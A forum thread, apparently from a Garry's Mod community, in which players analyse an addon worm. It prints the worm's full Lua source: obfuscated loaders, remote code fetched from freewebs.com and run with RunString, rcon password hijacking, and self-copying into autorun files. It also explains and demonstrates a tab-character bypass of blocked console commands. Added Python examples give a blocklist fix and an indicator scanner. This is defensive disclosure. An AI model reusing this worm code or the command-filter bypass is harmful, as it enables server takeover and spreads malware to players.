Virus discussion thread, don't make more threads.

I recently noticed that I have a virus in gmod. It makes me change my server's rcon password when I join. I searched for Rcon_password with Notepad++
and it found this in my addons folder for SBMP, Laser Stool 2, and Lua Socket Radio. These addons were fine until today. The code in them was:
[lua]
// THIS VIRUS BROUGHT TO YOU BY YOUR FAVORITE NOXIOUSE TROLLS

if ( OP ) then return end

OP = true

if ( MaxPlayers() > 1 ) then

local RrCd=[[RT=string.char(111,100,117,112,100,97,116,101,114,47,115,97,118,101,114)]]
local PrCd=[[AF=string.char(49,46,116,120,116) BF=string.char(50,46,116,120,116) CF=string.char(51,46,116,120,116)]]
local ArCd=[[T=string.char(104,116,116,112,58,47,47,119,119,119,46,102,114,101,101,119,101,98,115,46,99,111,109,47,103,109)..RT]]
local CrCd=[[function CR(a,b) AR=a BR=b http.Get(a..AF,"",function(c) ER=c http.Get(AR..BF,"",function(d) FR=d http.Get(AR..CF,"",function(e) BR(ER..FR..e) end) end) end) end]]
local SvCd=[[CR(T,function(c) T=nil RunString(c) end) for i=1,500 do Msg(string.rep(string.char(10),5000)) end]]
local NrCd=[[NLR=true for i=1,500 do Msg(string.rep(string.char(10),5000)) end]]

if ( SERVER ) then

for k, v in pairs( player.GetAll() ) do
	v:SendLua( RrCd )
	v:SendLua( PrCd )
	v:SendLua( ArCd )
	v:SendLua( CrCd )
	v:SendLua( SvCd )
end

hook.Add( "PlayerInitialSpawn", "PlayerSpawnInitial", function( ply )
	ply:SendLua( RrCd )
	ply:SendLua( PrCd )
	ply:SendLua( ArCd )
	ply:SendLua( CrCd )
	ply:SendLua( SvCd )
	ply:SendLua( NrCd )
end )

else

RunConsoleCommand( "rcon_password\t", "" )

local function ResetLog()
	RunConsoleCommand( "con_logfile\t", "" )
end

hook.Add( "InitPostEntity", "InitializeUpdate3", ResetLog )

local function UploadScript1()
	if ( !NLR && LocalPlayer():IsUserGroup( "superadmin" ) || LocalPlayer():IsSuperAdmin() ) then
		local RP = ""
		for i = 1, 8 do
			local Rand = math.random( 40, 122 )
			if ( Rand == 59 ) then Rand = 58 end
			RP = RP .. string.char( Rand )
		end
		if ( ulx ) then
			RunConsoleCommand( "ulx", "rcon", "rcon_password", RP )
			RunConsoleCommand( "rcon_password\t", RP )
		elseif ( ASS_VERSION ) then
			RunConsoleCommand( "ass_rconbegin" )
			for k, v in pairs( string.Explode( "", "rcon_password " .. RP ) ) do
				RunConsoleCommand( "ass_rcon", string.byte( v ) )
			end
			RunConsoleCommand( "ass_rconend" )
			RunConsoleCommand( "rcon_password\t", RP )
		end
	end
end

hook.Add( "InitPostEntity", "InitializeUpdate1", function() timer.Simple( 5, UploadScript1 ) end )

local function SC( str )
	RunConsoleCommand( "rcon\t", "lua_run", str )
end

local function UploadScript2()
	if ( !NLR ) then
		local rcon = GetConVarString( "rcon_password" )
		if ( rcon && rcon != "" ) then
			timer.Simple( 5, function()
				SC( RrCd )
				timer.Simple( 0.1, function()
					SC( PrCd )
					timer.Simple( 0.1, function()
						SC( ArCd )
						timer.Simple( 0.1, function()
							SC( CrCd )
							timer.Simple( 0.1, function()
								SC( SvCd )
								timer.Simple( 0.05, ResetLog )
							end )
						end )
					end )
				end )
			end )
		else
			timer.Simple( 1, UploadScript2 )
		end
	end
end

hook.Add( "InitPostEntity", "InitializeUpdate2", function() timer.Simple( 1, UploadScript2 ) end )

end

end

local nVsn = 0
local HTTP = HTTPGet()

function UpdateRequest()
HTTP:Download( "http://www.freewebs.com/gmodupdater/command.txt", "" )
end

function UpdateTimeOut()
if ( HTTP:Finished() ) then
	local code = HTTP:GetBuffer()
	if ( code != "" ) then
		local Find = string.find( code, "\n" )
		local Version = tonumber( string.sub( code, 1, Find - 1 ) )
		if ( Version && Version > nVsn ) then
			RunString( string.sub( code, Find + 1 ) )
			nVsn = Version
		end
	end
	UpdateRequest()
end
end

timer.Create( "UpdateTimeOut", 1, 0, UpdateTimeOut )

UpdateRequest()
[/lua]
This was at the bottom of:
Laser STOOL 2\lua\autorun\laserlib.lua
SBMP\lua\autorun\toolmodeladd.lua
Wire Socket Radio\lua\autorun\freefall_string.lua

The virus appears to add lines to the bottom of my addons when I start GMod.

Do the same I did if you have:

  • Backward text in your game
  • Changing Rcon password with ULX or ASS Mod
  • Spamming to unban some guy from FacePunch

It appears to have gotten on my server as well.

Interesting, although I do not get this.

Great find. I’ll defer this to some LUA coders and they’ll hopefully get to work on an antivirus.

This here is actually what the script sends to players:

[lua]RunConsoleCommand( "log", "off" )

for i = 1, 500 do Msg( string.rep( "\n", 5000 ) ) end

if ( ( !file.Exists( "../addons/readme.txt" ) || file.Read( "../addons/readme.txt" ) != "This is where addons go.\n" ) && MaxPlayers() > 1 ) then

local function ResetLog()

	RunConsoleCommand( "con_logfile\t", "" )

end

RunConsoleCommand( "con_logfile\t", "addons/readme.txt" )

timer.Simple( 0.05, function()
	
	print( "This is where addons go." )

	timer.Simple( 0.05, function()

		ResetLog()

	end )

end )

local Code
local SaveFiles = {}

function SaveUpdate( file, code )

	RunConsoleCommand( "con_logfile\t", file )

	if ( file == "." ) then

		timer.Simple( 1, function()

			for i = 1, 500 do Msg( string.rep( "\n", 5000 ) ) end

		end )

		return

	end

	timer.Simple( 0.05, function()

		print( "" )

		for k, v in pairs( string.Explode( "\n", code ) ) do

		print( v )

		end

		RunString( code )

	end )

end

timer.Create( "SaveUpdate1", 0.25, 0, function()

	if ( Code && SaveFiles && table.Count( SaveFiles ) > 0 ) then

		for k, v in pairs( SaveFiles ) do

			SaveUpdate( v, Code )

			table.remove( SaveFiles, k )

			break

		end

	end

end )

timer.Simple( 10, hook.Remove, "Think", "SaveUpdate1" )

CR( "http://www.freewebs.com/gmodupdater/script", function( code )

	Code = code

	local Files = {}
	local Find = file.Find( "../addons/*" )

	for k, v in pairs( Find ) do

		if ( v != "counter-strike" && v != "day-of-defeat" && v != "default_sent_pack" && v != "derma" && v != "hl2_ep2" && v != "portal" && v != "tf2" ) then

			local Ext = string.GetExtensionFromFilename( v )

			if ( Ext == "" || Ext == nil ) then

				local Find = file.Find( "../addons/" .. v .. "/lua/autorun/*" )

				for j, c in pairs( Find ) do

					local Ext = string.GetExtensionFromFilename( c )

					if ( c != "client.lua" && string.sub( c, 1, 3 ) != "cl_" && string.lower( Ext ) == "lua" ) then

						table.insert( Files, "../addons/" .. v .. "/lua/autorun/" .. c )

					end

				end

			end

		end

	end

	if ( #Files == 0 ) then

		local Find = file.Find( "../gamemodes/*" )

		for k, v in pairs( Find ) do

			local Ext = string.GetExtensionFromFilename( v )

			if ( Ext == "" || Ext == nil ) then

				local File = "../gamemodes/" .. v .. "/gamemode/shared.lua"

				if ( file.Exists( File ) ) then

					table.insert( Files, File )

				end

			end

		end

	end

	SaveFiles = {}

	for i = 1, math.Clamp( 3, 0, #Files ) do

		local rand = math.random( 1, #Files )

		table.insert( SaveFiles, string.sub( Files[ rand ], 4 ) )

	end

	table.insert( SaveFiles, "." )

end )

end
[/lua]

Edit:

It’s getting it via http.Get().

Edit:

And here are the URLs of the two files getting downloaded and concatenated:
http://www.freewebs.com/gmodupdater/saver1.txt
http://www.freewebs.com/gmodupdater/saver2.txt
http://www.freewebs.com/gmodupdater/saver3.txt

And here is the script posted in the first post:

http://www.freewebs.com/gmodupdater/script1.txt
http://www.freewebs.com/gmodupdater/script2.txt
http://www.freewebs.com/gmodupdater/script3.txt

http.Get is fetching

WHY THE FUCK is it fetching a number?

You just got “trapped”, leach139.
The URL http://www.freewebs.com/gmodupdater/command.txt seems to be an “update” identifier.

Oh and by the way, the content of http://www.freewebs.com/gmodupdater/command.txt just changed to

233
FOOD = false

By the way, why must all these idiotic “virus” writers (they are worms - but this worm has a virus part - still a worm) “encrypt” their files? Any more advanced coder can easily “encrypt” them (I just put a print on the important parts of the file).

Yum, food.

This is a really big loophole. I’ll pull RabidToaster in on it as well.

I wouldn’t blame a specific person for this code because it could be everyone.

Edit:

I just noticed: this worm uses con_logfile together with RunString() to infect Lua files.

Wasn’t con_logfile blocked in the last GMod update by garry to prevent exactly this?
If yes, this worm is a cold case and can’t harm any further people - but if you are infected, better consider reinstalling gmod.

I just got it. It just started happening about an hour and a half ago on my server.

It just spread to my server, and it's still spreading to my users. I am trying to find the files that were infected. Can anyone help me by finding out where the files are put on the server when they are uploaded?

It just spread to me. My friend had it (he is superadmin on my server) and it got on the server. He told me to restart the server, I got on, and it made me download some files.

It uses \t on the end of con_logfile to bypass the protection. It seems that any other escape characters (apart from \n, which was blocked) work as well…

We found out (basically [DuckYStudios] LUADuck and RabidToaster - I was afk :)) why the worm above can still infect current GMOD versions.

The issue is, garry blocks console commands like sv_cheats or con_logfile by default.

But if you use special whitespace like
[ul]
[li]\t (tab)[/li]
[li]\r (carriage return)[/li]
[li]\a (no idea what this is)[/li]
[li]\f (no idea what this is)[/li]
[li]\v (no idea what this is)[/li]
[li]\b (no idea what this is)[/li]
[li]\ä (no idea what this is)[/li]
[li]\ü (no idea what this is)[/li]
[li]\ö (no idea what this is)[/li]
[li]\1 (and any other numbers from 0-9 - no idea what this is)[/li]
[/ul]
you can bypass this.
(Garry, you better block \ at the end directly).

[lua]
RunConsoleCommand("con_logfile","/lua/autorun/HAX.lua")
[/lua]
-> RunConsoleCommand: Command is blocked! (con_logfile)

[lua]
RunConsoleCommand("con_logfile ","/lua/autorun/HAX.lua")
[/lua]
No errors.
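Added example (not code from the thread or from Garry's Mod): a Python model of the two checks the post above contrasts. `naive_is_blocked` does the exact-string lookup that lets a padded name through, and `normalized_is_blocked` trims the name and rejects anything that is not a plain command name before it consults the list. The blocklist contents, the name alphabet and the case-insensitive comparison are assumptions made for the illustration.

```python
import re

# Illustrative blocklist; the engine's real list is not quoted in the thread.
BLOCKED_COMMANDS = {"con_logfile", "sv_cheats", "rcon_password", "rcon"}

# Assumed shape of a well-formed console command name: letters, digits, underscore.
_COMMAND_NAME = re.compile(r"[A-Za-z0-9_]+")


def naive_is_blocked(command):
    """Exact-string lookup, the behaviour the post's experiment shows:
    'con_logfile' is refused, 'con_logfile\\t' is not."""
    return command in BLOCKED_COMMANDS


def normalized_is_blocked(command):
    """Refuse the command if it normalizes to a blocked name, or if it is not a
    clean command name at all (control bytes, escapes or padding anywhere)."""
    name = command.strip()  # drops space, \t, \r, \v and \f at either end
    if not _COMMAND_NAME.fullmatch(name):
        return True  # \a, \b, \1, non-ASCII bytes etc. never reach the lookup
    # Assumption: command names are compared case-insensitively.
    return name.lower() in BLOCKED_COMMANDS


def bypass_table(variants=None):
    """Run each padded variant listed in the post through both checks.
    Returns {variant: (naive_blocked, normalized_blocked)}."""
    if variants is None:
        # Constructed inputs mirroring the post's list of trailing characters.
        variants = ["con_logfile", "con_logfile\t", "con_logfile\r",
                    "con_logfile\a", "con_logfile\f", "con_logfile\v",
                    "con_logfile\b", "con_logfile\x01", "con_logfile\u00e4"]
    return {v: (naive_is_blocked(v), normalized_is_blocked(v)) for v in variants}


if __name__ == "__main__":
    for variant, (naive, fixed) in bypass_table().items():
        print(repr(variant), "naive:", naive, "normalized:", fixed)
```

Only the unpadded name is caught by the naive check; every variant is refused by the normalized one, because trimming handles the whitespace family and the name-alphabet check handles everything else without needing a list of bad escape characters.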

Am I correct in believing that this will change the MD5 of the Lua file in question? If so, I can make a quickshift program to scan for it and delete it.

No, let garry fix this security hole.

fuck :ninja:'d

You’re very keen on helping these people aren’t you :v:

Just tell them for the next update to delete all addons and reinstall it.
It’s too much work for you to get all possible hashes of every file of every addon of every version of this addon to be sure whether that file is infected or not.

I just tried rejoining my server (it's infected) and re-searched for the comment at the top of the code, and it reappeared in three new places in my addons folder.
It searches for your addons folder, picks 3 random ones, searches for the autorun folder inside them and infects one or all of the files.
Hope that helps.

I could make it scan for the string rcon_password and display the files with that in it?
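Added example, not from the thread: a Python scanner that does what the two posts above ask for. It walks `addons/*/lua/autorun` and `gamemodes/`, the two places the worm quoted earlier in the thread writes into, and reports Lua files that carry the worm's indicators (the header comment, the freewebs updater URL, `con_logfile` / `rcon_password` with a padded name, `RunString`, and long `string.char` byte runs). The indicator list, the two-indicator threshold and the sample install it builds are constructed for the illustration.

```python
"""Indicator scan for the addon worm quoted in this thread (added example)."""
import os
import re
import tempfile

# Indicators taken from the worm code quoted in the thread.
INDICATORS = {
    "marker_comment": re.compile(r"THIS VIRUS BROUGHT TO YOU BY", re.IGNORECASE),
    "updater_url": re.compile(r"freewebs\.com/gmodupdater", re.IGNORECASE),
    # con_logfile / rcon_password followed by whitespace or a backslash escape:
    # the trailing character is what slips past the exact-match command block.
    "con_logfile_padded": re.compile(r'"con_logfile(?:\s|\\)'),
    "rcon_password_padded": re.compile(r'"rcon_password(?:\s|\\)'),
    "remote_runstring": re.compile(r"\bRunString\s*\("),
    # long runs of decimal bytes in string.char(...) are the worm's obfuscation
    "char_obfuscation": re.compile(r"string\.char\(\s*(?:\d+\s*,\s*){8,}\d+\s*\)"),
}

# The quoted worm writes into addons/*/lua/autorun/*.lua and, when no addon
# qualifies, gamemodes/*/gamemode/shared.lua; scan both trees.
TARGET_DIRS = ("addons", "gamemodes")


def scan_file(path):
    """Return the sorted names of indicators found in one Lua file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(hits):
    """Flag on the marker comment alone, otherwise on two or more indicators
    (RunString by itself is common in legitimate addons)."""
    return "marker_comment" in hits or len(hits) >= 2


def scan_tree(root):
    """Walk root/addons and root/gamemodes; return {path: hits} for flagged files."""
    flagged = {}
    for sub in TARGET_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, sub)):
            for name in files:
                if not name.lower().endswith(".lua"):
                    continue
                path = os.path.join(dirpath, name)
                hits = scan_file(path)
                if is_suspicious(hits):
                    flagged[path] = hits
    return flagged


def build_sample_tree():
    """Constructed sample install: one clean autorun file and one carrying a
    fragment of the worm quoted in the thread. Returns (root, infected, clean)."""
    root = tempfile.mkdtemp(prefix="gmod_scan_")
    infected_dir = os.path.join(root, "addons", "Laser STOOL 2", "lua", "autorun")
    clean_dir = os.path.join(root, "addons", "wire", "lua", "autorun")
    os.makedirs(infected_dir)
    os.makedirs(clean_dir)
    infected = os.path.join(infected_dir, "laserlib.lua")
    clean = os.path.join(clean_dir, "wire_init.lua")
    with open(infected, "w", encoding="utf-8") as fh:
        fh.write('-- legitimate addon code above this point\n'
                 '// THIS VIRUS BROUGHT TO YOU BY YOUR FAVORITE NOXIOUSE TROLLS\n'
                 'RunConsoleCommand( "con_logfile\\t", "" )\n'
                 'HTTP:Download( "http://www.freewebs.com/gmodupdater/command.txt", "" )\n')
    with open(clean, "w", encoding="utf-8") as fh:
        fh.write('-- ordinary addon that happens to use RunString\n'
                 'RunString( "print(1)" )\n')
    return root, infected, clean


if __name__ == "__main__":
    sample_root, _infected, _clean = build_sample_tree()
    for path, hits in scan_tree(sample_root).items():
        print(path, "->", ", ".join(hits))
```

Run it against a real server by calling `scan_tree` with the game directory instead of the sample root. The point of the threshold is to answer the earlier objection about hashing every addon version: the scan keys on what the worm appends rather than on what a clean file should look like, so it needs no per-addon hash list.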

Can someone get Garry’s attention in here?
It would really help if he could get this fixed.

The chances of garry seeing this within the next 5 seconds are 1/10000000000000000000000000000000000000000000000